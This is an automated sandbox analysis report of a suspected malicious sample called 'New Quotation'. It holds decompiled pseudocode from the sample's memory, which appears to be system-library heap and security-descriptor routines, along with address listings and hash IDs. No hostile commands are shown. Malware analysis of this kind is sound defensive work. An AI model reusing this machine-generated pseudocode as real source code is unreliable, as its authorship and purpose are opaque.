													_v48 = _v48 + 1;
													_v52 = _t400 >> 0x00000008 & 0x0000ffff;
												} while (_t432 != 0);
												_t455 = _v28;
												_t438 = _v64;
												_t307 = _v52;
												goto L36;
											}
											_t53 = _t306 + 8; // 0x8
											_t417 = _t53;
											_t54 = _t438 + 8; // 0x8
											_t364 = _t54;
											goto L30;
										}
										L26:
										_t412 = _t412 + 1;
										if(_t412 <= _v20) {
											_t44 = _t438 + 0x10; // 0x10
											_t227 = _t44;
											_t455 =  *_t227;
											_v28 = _t455;
											if((_t455 >> 0x00000010 & 0x00008000) != 0) {
												goto L26;
											}
											goto L25;
										}
										_t455 = _t455 | 0xffffffff;
										_v28 = _t455;
										goto L28;
									}
								} else {
									_t410 =  *(_t454 + 0xc);
									_push(0);
									_push(0);
									_push(0);
									goto L93;
								}
							}
							L98:
							_t325 = _t325 + 1;
							_v60 = _t325;
						} while (_t325 < _v44);
						_t324 = 1;
						goto L100;
					}
					L2:
					_v44 = _t324;
					goto L5;
					L100:
					_t405 = _t405 + 1;
					_v40 = _t405;
				} while (_t405 < 0x81);
				_t166 = _t435 + 0x38; // 0x38
				_t303 = _t166;
				_v48 = 0xc;
				_v44 = _t303;
				do {
					_t450 = 0;
					_t197 = E1D85E9F6(_t303);
					_t436 = _t197;
					if(_t436 == 0) {
						goto L115;
					}
					_t305 = _v32;
					do {
						_t406 = _t436;
						_t436 =  *_t436;
						_v40 = _t406;
						_t201 = 1 <<  *(_t406 + 8);
						if(1 > 0x78000) {
							_t201 = 0x78000;
						}
						_t333 = ( *(_t406 + 0xa) & 0x0000ffff) + _t201;
						_v36 = _v36 + _t333;
						_v28 = _t333;
						E1D7CDD43( *((intOrPtr*)(_t305 + 0xc)), _t406, _t333);
						_t450 = _t450 + 1;
						if(E1D7E3C40() == 0) {
							_t197 = 0x7ffe0380;
						} else {
							_t197 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t197 != 0) {
							_t197 =  *[fs:0x30];
							if(( *(_t197 + 0x240) & 1) != 0) {
								E1D88F4FD(_t305,  *((intOrPtr*)(_t305 + 0xc)), _v40, _v28, 0);
								_t197 = E1D88F582(_t305,  *((intOrPtr*)(_t305 + 0xc)), _v48, _v36, 0);
							}
						}
					} while (_t436 != 0);
					_t303 = _v44;
					if(_t450 != 0) {
						_t197 = _t303 + 8;
						asm("lock xadd [eax], esi");
					}
					L115:
					_t303 = _t303 + 0x20;
					_t189 =  &_v48;
					 *_t189 = _v48 - 1;
					_v44 = _t303;
				} while ( *_t189 != 0);
				if(_v36 != 0) {
					_t197 = _v32 + 0x2c;
					asm("lock xadd [eax], ecx");
				}
				return _t197;
			}


























































































                                                                                                                                                                                          0x1d8918e7
                                                                                                                                                                                          0x1d8918ea
                                                                                                                                                                                          0x1d8918ec
                                                                                                                                                                                          0x1d8918f0
                                                                                                                                                                                          0x1d8918f2
                                                                                                                                                                                          0x1d8918f8
                                                                                                                                                                                          0x1d8918fc
                                                                                                                                                                                          0x1d8918fd
                                                                                                                                                                                          0x1d891906
                                                                                                                                                                                          0x1d891914
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891916
                                                                                                                                                                                          0x1d89191b
                                                                                                                                                                                          0x1d891921
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891927
                                                                                                                                                                                          0x1d891927
                                                                                                                                                                                          0x1d891929
                                                                                                                                                                                          0x1d89192d
                                                                                                                                                                                          0x1d89192f
                                                                                                                                                                                          0x1d89193a
                                                                                                                                                                                          0x1d89193d
                                                                                                                                                                                          0x1d891944
                                                                                                                                                                                          0x1d891931
                                                                                                                                                                                          0x1d891931
                                                                                                                                                                                          0x1d891931
                                                                                                                                                                                          0x1d89194d
                                                                                                                                                                                          0x1d891963
                                                                                                                                                                                          0x1d891968
                                                                                                                                                                                          0x1d89196c
                                                                                                                                                                                          0x1d891e30
                                                                                                                                                                                          0x1d891e32
                                                                                                                                                                                          0x1d891e32
                                                                                                                                                                                          0x1d891e36
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891e36
                                                                                                                                                                                          0x1d891976
                                                                                                                                                                                          0x1d89197b
                                                                                                                                                                                          0x1d891989
                                                                                                                                                                                          0x1d89198e
                                                                                                                                                                                          0x1d891e1c
                                                                                                                                                                                          0x1d891e1c
                                                                                                                                                                                          0x1d891e1d
                                                                                                                                                                                          0x1d891e1e
                                                                                                                                                                                          0x1d891e1f
                                                                                                                                                                                          0x1d891e1f
                                                                                                                                                                                          0x1d891e22
                                                                                                                                                                                          0x1d891e23
                                                                                                                                                                                          0x1d891e28
                                                                                                                                                                                          0x1d891e28
                                                                                                                                                                                          0x1d891e2a
                                                                                                                                                                                          0x1d891e2a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891e2a
                                                                                                                                                                                          0x1d891999
                                                                                                                                                                                          0x1d89199b
                                                                                                                                                                                          0x1d8919a1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8919aa
                                                                                                                                                                                          0x1d8919b0
                                                                                                                                                                                          0x1d8919b5
                                                                                                                                                                                          0x1d8919b9
                                                                                                                                                                                          0x1d8919bd
                                                                                                                                                                                          0x1d8919c3
                                                                                                                                                                                          0x1d8919e6
                                                                                                                                                                                          0x1d8919fc
                                                                                                                                                                                          0x1d891a0e
                                                                                                                                                                                          0x1d8919fe
                                                                                                                                                                                          0x1d891a07
                                                                                                                                                                                          0x1d891a07
                                                                                                                                                                                          0x1d891a16
                                                                                                                                                                                          0x1d891a2c
                                                                                                                                                                                          0x1d891a31
                                                                                                                                                                                          0x1d891a31
                                                                                                                                                                                          0x1d891a40
                                                                                                                                                                                          0x1d891a47
                                                                                                                                                                                          0x1d891a4b
                                                                                                                                                                                          0x1d891a4d
                                                                                                                                                                                          0x1d891a4d
                                                                                                                                                                                          0x1d891a50
                                                                                                                                                                                          0x1d891a59
                                                                                                                                                                                          0x1d891a59
                                                                                                                                                                                          0x1d891a60
                                                                                                                                                                                          0x1d891a69
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891a6b
                                                                                                                                                                                          0x1d891a79
                                                                                                                                                                                          0x1d891a7d
                                                                                                                                                                                          0x1d891a83
                                                                                                                                                                                          0x1d891a93
                                                                                                                                                                                          0x1d891a93
                                                                                                                                                                                          0x1d891a9a
                                                                                                                                                                                          0x1d891ab0
                                                                                                                                                                                          0x1d891ab7
                                                                                                                                                                                          0x1d891ac0
                                                                                                                                                                                          0x1d891afd
                                                                                                                                                                                          0x1d891b05
                                                                                                                                                                                          0x1d891b0c
                                                                                                                                                                                          0x1d891b12
                                                                                                                                                                                          0x1d891d4b
                                                                                                                                                                                          0x1d891d4b
                                                                                                                                                                                          0x1d891d4b
                                                                                                                                                                                          0x1d891d4e
                                                                                                                                                                                          0x1d891d55
                                                                                                                                                                                          0x1d891d6c
                                                                                                                                                                                          0x1d891d6c
                                                                                                                                                                                          0x1d891d70
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d86
                                                                                                                                                                                          0x1d891d8c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d8e
                                                                                                                                                                                          0x1d891d92
                                                                                                                                                                                          0x1d891d96
                                                                                                                                                                                          0x1d891d98
                                                                                                                                                                                          0x1d891da7
                                                                                                                                                                                          0x1d891dab
                                                                                                                                                                                          0x1d891dc0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891dc6
                                                                                                                                                                                          0x1d891dcc
                                                                                                                                                                                          0x1d891dfa
                                                                                                                                                                                          0x1d891dfb
                                                                                                                                                                                          0x1d891dfd
                                                                                                                                                                                          0x1d891e01
                                                                                                                                                                                          0x1d891e01
                                                                                                                                                                                          0x1d891e07
                                                                                                                                                                                          0x1d891e0c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891e10
                                                                                                                                                                                          0x1d891e12
                                                                                                                                                                                          0x1d891e14
                                                                                                                                                                                          0x1d891d16
                                                                                                                                                                                          0x1d891d16
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d16
                                                                                                                                                                                          0x1d891dce
                                                                                                                                                                                          0x1d891dce
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891dce
                                                                                                                                                                                          0x1d891db1
                                                                                                                                                                                          0x1d891db7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891dd2
                                                                                                                                                                                          0x1d891dd2
                                                                                                                                                                                          0x1d891dd3
                                                                                                                                                                                          0x1d891dea
                                                                                                                                                                                          0x1d891dea
                                                                                                                                                                                          0x1d891ded
                                                                                                                                                                                          0x1d891aa2
                                                                                                                                                                                          0x1d891aa2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891aa2
                                                                                                                                                                                          0x1d891d6c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d55
                                                                                                                                                                                          0x1d891b1a
                                                                                                                                                                                          0x1d891b1d
                                                                                                                                                                                          0x1d891b26
                                                                                                                                                                                          0x1d891b39
                                                                                                                                                                                          0x1d891b3d
                                                                                                                                                                                          0x1d891b41
                                                                                                                                                                                          0x1d891b44
                                                                                                                                                                                          0x1d891b44
                                                                                                                                                                                          0x1d891b48
                                                                                                                                                                                          0x1d891c22
                                                                                                                                                                                          0x1d891c2a
                                                                                                                                                                                          0x1d891c2e
                                                                                                                                                                                          0x1d891c31
                                                                                                                                                                                          0x1d891c35
                                                                                                                                                                                          0x1d891c46
                                                                                                                                                                                          0x1d891c4a
                                                                                                                                                                                          0x1d891c5d
                                                                                                                                                                                          0x1d891c60
                                                                                                                                                                                          0x1d891c63
                                                                                                                                                                                          0x1d891c6a
                                                                                                                                                                                          0x1d891c74
                                                                                                                                                                                          0x1d891c79
                                                                                                                                                                                          0x1d891c7e
                                                                                                                                                                                          0x1d891c7f
                                                                                                                                                                                          0x1d891c81
                                                                                                                                                                                          0x1d891c81
                                                                                                                                                                                          0x1d891c8c
                                                                                                                                                                                          0x1d891c94
                                                                                                                                                                                          0x1d891c99
                                                                                                                                                                                          0x1d891c9f
                                                                                                                                                                                          0x1d891ca5
                                                                                                                                                                                          0x1d891ca5
                                                                                                                                                                                          0x1d891ca8
                                                                                                                                                                                          0x1d891cac
                                                                                                                                                                                          0x1d891cb0
                                                                                                                                                                                          0x1d891cb0
                                                                                                                                                                                          0x1d891cb2
                                                                                                                                                                                          0x1d891cb7
                                                                                                                                                                                          0x1d891cc6
                                                                                                                                                                                          0x1d891cd0
                                                                                                                                                                                          0x1d891cd0
                                                                                                                                                                                          0x1d891cdc
                                                                                                                                                                                          0x1d891ce0
                                                                                                                                                                                          0x1d891ce6
                                                                                                                                                                                          0x1d891ce9
                                                                                                                                                                                          0x1d891cef
                                                                                                                                                                                          0x1d891cf2
                                                                                                                                                                                          0x1d891cf5
                                                                                                                                                                                          0x1d891cf6
                                                                                                                                                                                          0x1d891cf8
                                                                                                                                                                                          0x1d891cfc
                                                                                                                                                                                          0x1d891cfc
                                                                                                                                                                                          0x1d891d07
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d0f
                                                                                                                                                                                          0x1d891d0f
                                                                                                                                                                                          0x1d891d12
                                                                                                                                                                                          0x1d891d14
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d14
                                                                                                                                                                                          0x1d891b50
                                                                                                                                                                                          0x1d891b50
                                                                                                                                                                                          0x1d891b53
                                                                                                                                                                                          0x1d891b54
                                                                                                                                                                                          0x1d891b56
                                                                                                                                                                                          0x1d891b5a
                                                                                                                                                                                          0x1d891b5a
                                                                                                                                                                                          0x1d891b63
                                                                                                                                                                                          0x1d891b7f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891b85
                                                                                                                                                                                          0x1d891b85
                                                                                                                                                                                          0x1d891b85
                                                                                                                                                                                          0x1d891b89
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891b9f
                                                                                                                                                                                          0x1d891ba5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891ba7
                                                                                                                                                                                          0x1d891bab
                                                                                                                                                                                          0x1d891baf
                                                                                                                                                                                          0x1d891bb1
                                                                                                                                                                                          0x1d891bbd
                                                                                                                                                                                          0x1d891bc0
                                                                                                                                                                                          0x1d891bc2
                                                                                                                                                                                          0x1d891bc8
                                                                                                                                                                                          0x1d891be1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891beb
                                                                                                                                                                                          0x1d891bef
                                                                                                                                                                                          0x1d891bf5
                                                                                                                                                                                          0x1d891d25
                                                                                                                                                                                          0x1d891d26
                                                                                                                                                                                          0x1d891d28
                                                                                                                                                                                          0x1d891d2c
                                                                                                                                                                                          0x1d891d2c
                                                                                                                                                                                          0x1d891d35
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891d3d
                                                                                                                                                                                          0x1d891d41
                                                                                                                                                                                          0x1d891d43
                                                                                                                                                                                          0x1d891c1d
                                                                                                                                                                                          0x1d891c1d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891c1d
                                                                                                                                                                                          0x1d891bfb
                                                                                                                                                                                          0x1d891bfb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891bfb
                                                                                                                                                                                          0x1d891bd2
                                                                                                                                                                                          0x1d891bd8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891bff
                                                                                                                                                                                          0x1d891bff
                                                                                                                                                                                          0x1d891c00
                                                                                                                                                                                          0x1d891c17
                                                                                                                                                                                          0x1d891c1a
                                                                                                                                                                                          0x1d891c1a
                                                                                                                                                                                          0x1d891c1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891c1a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891b85
                                                                                                                                                                                          0x1d891b67
                                                                                                                                                                                          0x1d891b6b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891b26
                                                                                                                                                                                          0x1d891ac2
                                                                                                                                                                                          0x1d891aca
                                                                                                                                                                                          0x1d891ace
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891ad4
                                                                                                                                                                                          0x1d891ad4
                                                                                                                                                                                          0x1d891ada
                                                                                                                                                                                          0x1d891ae2
                                                                                                                                                                                          0x1d891ae5
                                                                                                                                                                                          0x1d891ae9
                                                                                                                                                                                          0x1d891aed
                                                                                                                                                                                          0x1d891af1
                                                                                                                                                                                          0x1d891af5
                                                                                                                                                                                          0x1d891af9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891af9
                                                                                                                                                                                          0x1d891a9c
                                                                                                                                                                                          0x1d891a9c
                                                                                                                                                                                          0x1d891a9f
                                                                                                                                                                                          0x1d891a9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891a9f
                                                                                                                                                                                          0x1d891a85
                                                                                                                                                                                          0x1d891a85
                                                                                                                                                                                          0x1d891a8a
                                                                                                                                                                                          0x1d891a56
                                                                                                                                                                                          0x1d891a56
                                                                                                                                                                                          0x1d891a59
                                                                                                                                                                                          0x1d891a60
                                                                                                                                                                                          0x1d891a69
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891a69
                                                                                                                                                                                          0x1d891a8c
                                                                                                                                                                                          0x1d891a8f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891a8f
                                                                                                                                                                                          0x1d8919e8
                                                                                                                                                                                          0x1d8919e8
                                                                                                                                                                                          0x1d8919ed
                                                                                                                                                                                          0x1d8919ee
                                                                                                                                                                                          0x1d8919ef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8919ef
                                                                                                                                                                                          0x1d8919e6
                                                                                                                                                                                          0x1d891e3a
                                                                                                                                                                                          0x1d891e3a
                                                                                                                                                                                          0x1d891e3b
                                                                                                                                                                                          0x1d891e3f
                                                                                                                                                                                          0x1d891e4b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891e4b
                                                                                                                                                                                          0x1d891908
                                                                                                                                                                                          0x1d891908
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891e4c
                                                                                                                                                                                          0x1d891e4c
                                                                                                                                                                                          0x1d891e4d
                                                                                                                                                                                          0x1d891e51
                                                                                                                                                                                          0x1d891e5d
                                                                                                                                                                                          0x1d891e5d
                                                                                                                                                                                          0x1d891e60
                                                                                                                                                                                          0x1d891e68
                                                                                                                                                                                          0x1d891e6c
                                                                                                                                                                                          0x1d891e70
                                                                                                                                                                                          0x1d891e72
                                                                                                                                                                                          0x1d891e77
                                                                                                                                                                                          0x1d891e7b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d891e81
                                                                                                                                                                                          0x1d891e85
                                                                                                                                                                                          0x1d891e85
                                                                                                                                                                                          0x1d891e89
                                                                                                                                                                                          0x1d891e8c
                                                                                                                                                                                          0x1d891e93
                                                                                                                                                                                          0x1d891e9c
                                                                                                                                                                                          0x1d891e9e
                                                                                                                                                                                          0x1d891e9e
                                                                                                                                                                                          0x1d891ea4
                                                                                                                                                                                          0x1d891ea6
                                                                                                                                                                                          0x1d891eaa
                                                                                                                                                                                          0x1d891eb2
                                                                                                                                                                                          0x1d891eb7
                                                                                                                                                                                          0x1d891ebf
                                                                                                                                                                                          0x1d891ed1
                                                                                                                                                                                          0x1d891ec1
                                                                                                                                                                                          0x1d891eca
                                                                                                                                                                                          0x1d891eca
                                                                                                                                                                                          0x1d891ed9
                                                                                                                                                                                          0x1d891edb
                                                                                                                                                                                          0x1d891eea
                                                                                                                                                                                          0x1d891efa
                                                                                                                                                                                          0x1d891f0d
                                                                                                                                                                                          0x1d891f0d
                                                                                                                                                                                          0x1d891eea
                                                                                                                                                                                          0x1d891f12
                                                                                                                                                                                          0x1d891f1a
                                                                                                                                                                                          0x1d891f20
                                                                                                                                                                                          0x1d891f24
                                                                                                                                                                                          0x1d891f27
                                                                                                                                                                                          0x1d891f27
                                                                                                                                                                                          0x1d891f2b
                                                                                                                                                                                          0x1d891f2b
                                                                                                                                                                                          0x1d891f2e
                                                                                                                                                                                          0x1d891f2e
                                                                                                                                                                                          0x1d891f33
                                                                                                                                                                                          0x1d891f33
                                                                                                                                                                                          0x1d891f43
                                                                                                                                                                                          0x1d891f4b
                                                                                                                                                                                          0x1d891f4e
                                                                                                                                                                                          0x1d891f4e
                                                                                                                                                                                          0x1d891f58

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a33bafe721ccffc9f234c3362a9ab1b53abd5f2804daba35e7dd592f7ecbc628
                                                                                                                                                                                          • Instruction ID: bbf267f041d5aec49b6b0bb1bd30bd1f854fc6e25462ac18296f553e785682d7
                                                                                                                                                                                          • Opcode Fuzzy Hash: a33bafe721ccffc9f234c3362a9ab1b53abd5f2804daba35e7dd592f7ecbc628
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95227F756082528FC709CF18C490A2AB3E2FFC9714B558A6DF5D6CB395D730E846CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7F8CDF Relevance: .6, Instructions: 554COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E1D7F8CDF(signed int __ecx, signed char* __edx, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr* _a20, signed int* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char* _v24;
				signed char* _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				signed int _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				intOrPtr _t227;
				signed int _t230;
				signed int _t235;
				signed int _t240;
				signed short _t241;
				signed int _t243;
				signed int _t245;
				signed int _t246;
				signed short _t247;
				signed int _t249;
				signed short _t252;
				signed int _t254;
				signed short _t258;
				signed short _t264;
				intOrPtr _t268;
				signed short _t269;
				signed int _t280;
				signed int _t286;
				signed int _t292;
				signed int _t298;
				signed int _t304;
				intOrPtr _t305;
				signed int _t307;
				signed int _t312;
				signed char* _t316;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed char* _t330;
				signed char* _t331;
				signed char* _t332;
				signed char* _t333;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed short _t341;
				signed int _t342;
				intOrPtr _t344;
				signed short _t345;
				signed short _t346;
				signed short _t347;
				signed int _t348;
				signed short _t349;
				signed short _t350;
				signed char* _t359;
				signed char* _t363;
				signed int _t364;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				void* _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				intOrPtr _t378;
				signed int _t381;
				char* _t382;
				char* _t383;
				char* _t384;
				char* _t385;
				char* _t386;
				intOrPtr* _t387;
				signed int* _t388;
				signed int _t389;
				void* _t390;

				_t218 = __ecx;
				_v12 = 2;
				_t381 = 0;
				_v20 = __ecx;
				_v40 = 0;
				_t316 = __edx;
				_v24 = __edx;
				_v16 = 0;
				_v36 = 0;
				if(__ecx != 0 || __edx != 0 || _a4 != 0 || _a8 != 0 || _a12 != 0 || _a16 != 0) {
					_t388 = _a24;
					_v8 = 8;
					__eflags = _t218;
					if(_t218 != 0) {
						_t363 = _t381;
						_t329 = _t218 + 8;
						_t381 = 0;
						_v28 = _t363;
						_v32 = _t329;
						__eflags = 0 -  *((intOrPtr*)(_t218 + 4));
						if(0 >=  *((intOrPtr*)(_t218 + 4))) {
							goto L9;
						}
						do {
							_t305 =  *_t329;
							__eflags = _t305 - 2;
							if(_t305 < 2) {
								goto L75;
							}
							__eflags = _t305 - 3;
							if(_t305 <= 3) {
								L70:
								_t321 = E1D7C94A3(_v8,  *(_t329 + 2) & 0x0000ffff,  &_v8);
								__eflags = _t321;
								if(_t321 < 0) {
									L39:
									 *_a20 = _v16;
									return _t321;
								}
								__eflags = _t388;
								if(_t388 != 0) {
									 *_t388 =  *_t388 | 0x00000008;
									__eflags =  *_t388;
								}
								_t329 = _v32;
								_t363 = _v28;
								_t312 =  *_v20 & 0x000000ff;
								__eflags = _t312 - _v12;
								if(_t312 > _v12) {
									_v12 = _t312;
								}
								goto L75;
							}
							__eflags = _t305 - 6;
							if(_t305 <= 6) {
								goto L75;
							}
							__eflags = _t305 - 8;
							if(_t305 <= 8) {
								goto L70;
							}
							__eflags = _t305 - 0xd - 3;
							if(_t305 - 0xd > 3) {
								goto L75;
							}
							goto L70;
							L75:
							_t363 = _t363 + 1;
							_t329 = _t329 + ( *(_t329 + 2) & 0x0000ffff);
							_v28 = _t363;
							_t307 = _v20;
							_v32 = _t329;
							__eflags = _t363 - ( *(_t307 + 4) & 0x0000ffff);
						} while (_t363 < ( *(_t307 + 4) & 0x0000ffff));
						_t316 = _v24;
					}
					L9:
					__eflags = _t316;
					if(_t316 == 0) {
						L18:
						_t219 = _a12;
						__eflags = _t219;
						if(_t219 != 0) {
							_t330 = _t219 + 8;
							__eflags = 0 -  *((intOrPtr*)(_t219 + 4));
							_t364 = _t381;
							while(1) {
								_v28 = _t330;
								_v32 = _t364;
								if(__eflags >= 0) {
									goto L19;
								}
								__eflags =  *_t330 - 0x14;
								if( *_t330 != 0x14) {
									L84:
									_t364 = _t364 + 1;
									_t330 = _t330 + ( *(_t330 + 2) & 0x0000ffff);
									__eflags = _t364 - ( *(_a12 + 4) & 0x0000ffff);
									continue;
								} else {
									_t321 = E1D7C94A3(_v8,  *(_t330 + 2) & 0x0000ffff,  &_v8);
									__eflags = _t321;
									if(_t321 < 0) {
										goto L39;
									}
									__eflags = _t388;
									if(_t388 != 0) {
										 *_t388 =  *_t388 | 0x00000080;
										__eflags =  *_t388;
									}
									_t364 = _v32;
									_t298 =  *_a12 & 0x000000ff;
									_t330 = _v28;
									__eflags = _t298 - _v12;
									if(_t298 > _v12) {
										_v12 = _t298;
									}
									goto L84;
								}
								L45:
								_t331 = _t220 + 8;
								__eflags = 0 -  *((intOrPtr*)(_t220 + 4));
								_t365 = _t381;
								while(1) {
									_v28 = _t331;
									_v32 = _t365;
									if(__eflags >= 0) {
										break;
									}
									__eflags =  *_t331 - 0x15;
									if( *_t331 != 0x15) {
										L91:
										_t365 = _t365 + 1;
										_t331 = _t331 + ( *(_t331 + 2) & 0x0000ffff);
										__eflags = _t365 - ( *(_a16 + 4) & 0x0000ffff);
										continue;
									} else {
										_t321 = E1D7C94A3(_v8,  *(_t331 + 2) & 0x0000ffff,  &_v8);
										__eflags = _t321;
										if(_t321 < 0) {
											goto L39;
										}
										__eflags = _t388;
										if(_t388 != 0) {
											 *_t388 =  *_t388 | 0x00000100;
											__eflags =  *_t388;
										}
										_t365 = _v32;
										_t292 =  *_a16 & 0x000000ff;
										_t331 = _v28;
										__eflags = _t292 - _v12;
										if(_t292 > _v12) {
											_v12 = _t292;
										}
										goto L91;
									}
									L48:
									_t78 = _t221 + 8; // 0xa
									_t332 = _t78;
									__eflags = 0 -  *((intOrPtr*)(_t221 + 4));
									_t366 = _t381;
									while(1) {
										_v28 = _t332;
										_v32 = _t366;
										if(__eflags >= 0) {
											break;
										}
										__eflags =  *_t332 - 0x12;
										if( *_t332 != 0x12) {
											L98:
											_t366 = _t366 + 1;
											_t332 = _t332 + ( *(_t332 + 2) & 0x0000ffff);
											__eflags = _t366 - ( *(_a4 + 4) & 0x0000ffff);
											continue;
										} else {
											_t321 = E1D7C94A3(_v8,  *(_t332 + 2) & 0x0000ffff,  &_v8);
											__eflags = _t321;
											if(_t321 < 0) {
												goto L39;
											}
											__eflags = _t388;
											if(_t388 != 0) {
												 *_t388 =  *_t388 | 0x00000020;
												__eflags =  *_t388;
											}
											_t366 = _v32;
											_t286 =  *_a4 & 0x000000ff;
											_t332 = _v28;
											__eflags = _t286 - _v12;
											if(_t286 > _v12) {
												_v12 = _t286;
											}
											goto L98;
										}
										L51:
										_t333 = _t222 + 8;
										__eflags = 0 -  *((intOrPtr*)(_t222 + 4));
										_t367 = _t381;
										while(1) {
											_v28 = _t333;
											_v32 = _t367;
											if(__eflags >= 0) {
												break;
											}
											__eflags =  *_t333 - 0x13;
											if( *_t333 != 0x13) {
												L105:
												_t367 = _t367 + 1;
												_t333 = _t333 + ( *(_t333 + 2) & 0x0000ffff);
												__eflags = _t367 - ( *(_a8 + 4) & 0x0000ffff);
												continue;
											} else {
												_t321 = E1D7C94A3(_v8,  *(_t333 + 2) & 0x0000ffff,  &_v8);
												__eflags = _t321;
												if(_t321 < 0) {
													goto L39;
												}
												__eflags = _t388;
												if(_t388 != 0) {
													 *_t388 =  *_t388 | 0x00000040;
													__eflags =  *_t388;
												}
												_t367 = _v32;
												_t280 =  *_a8 & 0x000000ff;
												_t333 = _v28;
												__eflags = _t280 - _v12;
												if(_t280 > _v12) {
													_v12 = _t280;
												}
												goto L105;
											}
											L54:
											_t338 = _t381;
											_v28 = _t369 + 8;
											_v32 = _t338;
											__eflags = 0 -  *(_t369 + 4);
											if(0 >=  *(_t369 + 4)) {
												L27:
												_t389 = _v36;
												L28:
												_t370 = _v24;
												__eflags = _t370;
												if(_t370 == 0) {
													L35:
													_t371 = _a12;
													__eflags = _t371;
													if(_t371 != 0) {
														_t339 = _t381;
														_v32 = _t371 + 8;
														_v36 = _t339;
														__eflags = 0 -  *(_t371 + 4);
														if(0 >=  *(_t371 + 4)) {
															goto L36;
														}
														_t385 = _v32;
														_t325 = _v16;
														do {
															__eflags =  *_t385 - 0x14;
															_t258 =  *(_t385 + 2) & 0x0000ffff;
															if( *_t385 == 0x14) {
																E1D8188C0(_t389, _t385, _t258);
																_t371 = _a12;
																_t390 = _t390 + 0xc;
																 *((short*)(_t325 + 4)) =  *((short*)(_t325 + 4)) + 1;
																_t347 =  *(_t385 + 2) & 0x0000ffff;
																_t389 = _t389 + _t347;
																__eflags = _t389;
																_t258 = _t347;
